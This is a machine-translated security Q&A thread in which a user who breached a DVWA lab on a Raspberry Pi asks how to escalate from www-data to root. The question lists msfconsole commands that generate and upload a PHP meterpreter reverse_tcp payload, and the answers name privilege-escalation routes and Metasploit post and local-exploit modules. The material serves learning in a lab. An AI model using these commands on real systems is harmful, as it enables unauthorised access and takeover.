MSFConsole / Kali Linux - obtenga acceso de root al sistema Unix

9

Estoy perdiendo el tiempo con Kali Linux, MSFConsole y DVWA (Damn Vulnerable Web Application).

He logrado ingresar al sistema (Raspberry Pi) al crear una puerta trasera de PHP y la cargué mediante inyección SQL.

Ahora tengo acceso al sistema, el único problema es que estoy ejecutando como www-data (¡¿no sería bueno convertirse en root para crear tu propia cuenta de superusuario ?!) ¿Es posible escalar los privilegios en Linux (Raspbaian) utilizando MSFConsole, BASH (desde la puerta trasera) o de otra manera?

He intentado ejecutar "use priv" en el indicador de meterpreter, pero el error que recibo es 'Error al cargar la extensión: no se encontró ningún módulo con el nombre ext_server_priv.php'. Si me ayuda, estoy ejecutando el exploit reverse_tcp como un script PHP.

Pude comprometer el sistema ejecutando esto es Msfconsole

use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit

Luego subí hackme.php al servidor web a través de la carga insegura de archivos, después de haberlo hecho, busqué en el archivo cargado.

El crédito va a este video por darme el código anterior. (Tuve que usar la función de generar en lugar de msfpayload porque esa funcionalidad se ha movido debido a que está en desuso).

    
pregunta iProgram 09.08.2015 - 19:29
fuente

3 respuestas

5

En este punto, ha alcanzado los conceptos básicos de un compromiso en el sistema y está en la fase común de explotación, que es la escalada de privilegios.

Exactamente cómo puede lograr eso depende mucho del sistema en cuestión, qué código está instalado en él y cómo está configurado. Algunas opciones para buscar cosas para obtener una escalada de privilegios en un sistema Linux

  • binarios de raíz SetUID que pueden escribirse por el usuario con el que está ejecutando. Si puede encontrar algo que puede sobrescribir, que cuando se ejecute se ejecutará como root, puede usar esto para aumentar sus privilegios.
  • Vulnerabilidades en los servicios del sistema que se ejecutan como root. Probablemente, esto dependerá del estado del parche del sistema en el que se esté ejecutando.

Otras cosas que se aplican más en las pruebas de seguridad "del mundo real" pero que es poco probable que se apliquen a su situación

  • Credenciales expuestas en archivos en el sistema. Esta puede ser una forma común de explotar sistemas.
  • Ataques de adivinación de contraseñas. Adivinar las credenciales es una buena manera de obtener acceso adicional
  • Pasar de su sistema atacado a otro en la misma red. Normalmente, una vez que un atacante tiene un punto de apoyo en una red, buscará otros sistemas que puedan tener configuraciones medias adicionales que podrían explotarse.
respondido por el Rоry McCune 13.08.2015 - 09:52
fuente
1

De acuerdo con la documentación de metasploit, el usuario priv es un módulo que solo está disponible para el medidor de Windows nativo (no para otros medidores de medidores).

Probablemente quiera ver la escalada de privilegios de Unix, que no conozco. No creo que haya un módulo automatizado para metasploit que haría eso ...

Buena suerte;)

    
respondido por el RedPanda 13.08.2015 - 09:20
fuente
1

Puede actualizar su shell a un Meterpreter con sesiones -u < # > y luego ejecute módulos posteriores (por ejemplo, post / multi / recon / local_exploit_suggester) o también puede tomar una sesión existente (Meterpreter o no) y ejecutar un exploit de escalado de privilegios local, por ejemplo, udev_netlink, sock_sendpage, y otros, configurando la SESSION variable.

Algunos módulos varían según el sistema operativo o el escenario, algunos son difíciles de encontrar en la jerarquía del marco de metasploit. Intente lo siguiente desde dentro de meterpreter:

  

mostrar publicación

     

ejecutar publicación / multi / <tab><tab>

     

ejecuta post / linux / <tab><tab>

     

ejecuta exploit / multi / <tab><tab>

También puede ejecutar una variedad de herramientas de escalamiento de privilegios fuera del marco de metasploit e iniciarlas en su sesión. Aquí hay dos módulos que ayudan en este esfuerzo:

  

usa post / multi / gather / multi_command

     

establecer RECURSO cmds.rc

     

use post / linux / manage / download_exec

     

establecer la URL enlace

Le sugiero que prepare un sistema en un laboratorio que coincida con las cualidades de su sistema objetivo, por ejemplo, el mismo sistema operativo, nivel de parche, instalables, ajustes de configuración, etc. Al mantener el acceso de root en este objetivo de laboratorio simulado, puede recrear lo que intentará hacer con el objetivo real. Una gran cantidad de herramientas de escalamiento de privilegios requieren acceso de raíz para ejecutarlas correctamente, por ejemplo, Nessus y OpenVAS en modo con credenciales, CIS-CAT, ovaldi, cvechecker, lynis, unix-privesc-check y enum4linux son herramientas excelentes en este espacio. Otros deberán ejecutarse solo en el sistema de destino real, como sucrack o phrasendrescher. Algunos ataques de escalada de privilegios requieren una planificación significativamente mayor, como la explotación de setuid / setgid personalizado binarios . Es probable que el RPi requiera un compilador cruzado para los exploits, y muchos incluso no funcionarán a menos que cambie las compensaciones para trabajar con los registros, códigos de operación y endianness de la plataforma ARM.

    
respondido por el atdre 13.08.2015 - 15:44
fuente

Lea otras preguntas en las etiquetas